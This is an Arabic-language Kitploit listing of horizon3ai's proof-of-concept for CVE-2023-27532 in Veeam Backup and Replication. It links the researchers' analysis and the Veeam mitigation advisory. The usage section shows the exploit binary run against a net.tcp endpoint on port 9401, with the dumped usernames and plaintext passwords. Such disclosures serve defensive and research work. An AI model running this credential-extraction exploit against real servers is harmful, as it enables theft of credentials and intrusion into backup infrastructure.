Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-27532 — استغلال إثبات المفهوم لثغرة CVE-2023-27532 في Veeam Backup and Replication، والذي يستغل نقطة نهاية API غير آمنة لاستخراج بيانات الاعتماد من النظام المستهدف. | Kitploit
أدوات/GitHubGitHub/horizon3ai/cve-2023-27532
تحليل الثغرات الأمنيةالاستغلالاختبار أمان APIاختبار الاختراقالفريق الأحمر
GitHubhorizon3ai/cve-2023-27532

CVE-2023-27532

استغلال إثبات المفهوم لثغرة CVE-2023-27532 في Veeam Backup and Replication، والذي يستغل نقطة نهاية API غير آمنة لاستخراج بيانات الاعتماد من النظام المستهدف.

عرض المستودع
741111منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-27532

POC لثغرة CVE-2023-27532 التي تؤثر على Veeam Backup and Replication

التحليل الفني

يمكن العثور على تحليل فني لجذر المشكلة (Root Cause) الخاص بهذه الثغرة على مدونتنا: https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive

ملخص

يستغل هذا الـ POC نقطة نهاية API غير محمية لاستخراج بيانات الاعتماد.

الاستخدام

/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://192.168.1.139:9401/
UserName = dev Password = Super Secret Password 
UserName = root Password =  
UserName = root Password =  
UserName = root Password =  
UserName = root Password =  

الإجراءات الوقائية

قم بالتحديث إلى أحدث إصدار أو خفّف من الخطورة باتباع التعليمات الواردة في تنبيه Veeam

  • https://www.veeam.com/kb4424

تابع فريق Horizon3.ai Attack Team على تويتر لآخر الأبحاث الأمنية:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

إخلاء المسؤولية

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، وليس المقصود منه استخدامه لمهاجمة الأنظمة إلا بموجب إذن صريح. القائمون على المشروع ليسوا مسؤولين عن إساءة استخدام هذا البرنامج. استخدمه بمسؤولية.

تنزيل الأداة